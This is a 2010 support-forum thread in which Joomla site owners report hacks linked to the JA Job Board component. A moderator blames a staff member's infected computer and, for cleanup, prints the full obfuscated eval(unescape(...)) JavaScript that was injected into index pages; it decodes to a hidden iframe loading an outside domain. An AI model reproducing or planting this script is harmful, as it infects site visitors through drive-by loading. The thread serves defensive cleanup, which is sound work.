-
AuthorPosts
-
jtruelson Friend
jtruelson
- Join date:
- March 2006
- Posts:
- 30
- Downloads:
- 0
- Uploads:
- 0
- Thanks:
- 2
- Thanked:
- 5 times in 1 posts
April 13, 2010 at 1:20 am #150322Our development site was compromised. We have had to restore from a recent backup.
All index pages were appended with hex coded script. Support ticket has been submitted – no reply as of yet.So far our efforts to isolate the cause have turned up the following:
from
http://www.securityfocus.com/bid/39384The JA Job Board ‘com_jajobboard’ component for Joomla! is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
JA Job Board ‘com_jajobboard’ 1.4.4 is vulnerable; other versions may be affected.
Anonymous ModeratorJA Developer
- Join date:
- September 2014
- Posts:
- 9914
- Downloads:
- 207
- Uploads:
- 152
- Thanks:
- 1789
- Thanked:
- 2008 times in 1700 posts
April 13, 2010 at 4:36 am #340174Hello jtruelson,
We express sincere apology for all inconveniences and problems that you have faced. 🙁
In fact, a new developer was newly assigned to share the support workload for job board and while he access your source via your FTP, the virus has penetrated to those files from his infected machine. I would like to confirm that the download package and our dev server is free from virus.
His machine has been reinstalled now with anti virus protection. Please give us access to your FTP again via ticket ID# (DTD-726753) for correcting our mistake and fixing the related issues.
He handles two cases and the other has been contacted to check if he faces the same problem for soonest solution
April 14, 2010 at 9:01 am #340320Hello,
the Web site was hacked 2 times since the 1.4.4 updated ! Web site is now unavailable 😮 for me
April 14, 2010 at 10:55 am #340330Hi,
My site was also hacked on Friday whilst awaiting support from your team.
We have had to rebuild the site and work is still ongoing to restore it.
I haven’t been contacted regarding your employees virus, but the two might be connected.
Could you confirm that this is definitely due to a virus on the PC of one of your team, not a vulnerability in JobBoard itself?
Is there anything else I should do to protect against further attacks?
Thanks,
April 14, 2010 at 2:23 pm #340357Also hacked here on sunday. I submitted a ticket.
Anonymous ModeratorJA Developer
- Join date:
- September 2014
- Posts:
- 9914
- Downloads:
- 207
- Uploads:
- 152
- Thanks:
- 1789
- Thanked:
- 2008 times in 1700 posts
April 15, 2010 at 3:03 am #340407Hi all,
• We would like to confirm that this is definitely due to a virus on the PC of one of out team, JA Job board packages as well as all other download packages, our dev servers are protected by licensed anti-virus system and free from virus. This is the first case and the last ever happens. We hereby apologizes for all inconveniences that may have causes.
• There are many causes leading to security holes for hacked websites. The problem caused by auto generated scripts is just one of those.
• After infection, the system shall not work stably. However, if the auto inserted scripts are removed from infected files, the whole system shall work fine again
• SOLUTION:
– For those whose job site seems not working stably recently, kindly open source files for tracking down infected files without influencing running computer or the whole websites because the strange scripts are lines of Javascript not program file with *.exe
– Infected files (normally in index.php or index2.php and some of files from running template) shall be inserted with the below unwanted lines at the bottom. You can manually search and get it removed. The unwanted script is as follows<blockquote><script>eval(unescape(‘%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%68%4F%58%2C%73%6A%63%75%2C%73%70%2C%49%41%76%42%2C%53%56%50%45%2C%74%77%68%29%7B%53%56%50%45%3D%66%75%6E%63%74%69%6F%6E%28%73%70%29%7B%72%65%74%75%72%6E%20%73%70%2E%74%6F%53%74%72%69%6E%67%28%73%6A%63%75%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%73%70%2D%2D%29%74%77%68%5B%53%56%50%45%28%73%70%29%5D%3D%49%41%76%42%5B%73%70%5D%7C%7C%53%56%50%45%28%73%70%29%3B%49%41%76%42%3D%5B%66%75%6E%63%74%69%6F%6E%28%53%56%50%45%29%7B%72%65%74%75%72%6E%20%74%77%68%5B%53%56%50%45%5D%7D%5D%3B%53%56%50%45%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%73%70%3D%31%7D%3B%77%68%69%6C%65%28%73%70%2D%2D%29%69%66%28%49%41%76%42%5B%73%70%5D%29%68%4F%58%3D%68%4F%58%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%53%56%50%45%28%73%70%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%49%41%76%42%5B%73%70%5D%29%3B%72%65%74%75%72%6E%20%68%4F%58%7D%28%27%38%2E%30%28%22%3C%64%20%63%3D%5C%5C%22%62%3A%2F%2F%61%2E%39%2F%5C%5C%22%20%37%3D%31%20%36%3D%31%20%35%3D%5C%5C%22%34%3A%33%3B%32%3A%65%5C%5C%22%3E%22%29%3B%27%2C%31%35%2C%31%35%2C%27%77%72%69%74%65%7C%7C%70%6F%73%69%74%69%6F%6E%7C%68%69%64%64%65%6E%7C%76%69%73%69%62%69%6C%69%74%79%7C%73%74%79%6C%65%7C%68%65%69%67%68%74%7C%77%69%64%74%68%7C%64%6F%63%75%6D%65%6E%74%7C%63%6F%6D%7C%61%76%65%72%73%62%6F%6E%6B%6F%7C%68%74%74%70%7C%73%72%63%7C%69%66%72%61%6D%65%7C%61%62%73%6F%6C%75%74%65%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29’)); </script></blockquote>
-
AuthorPosts
This topic contains 6 replies, has 5 voices, and was last updated by Anonymous 14 years, 6 months ago.
We moved to new unified forum. Please post all new support queries in our New Forum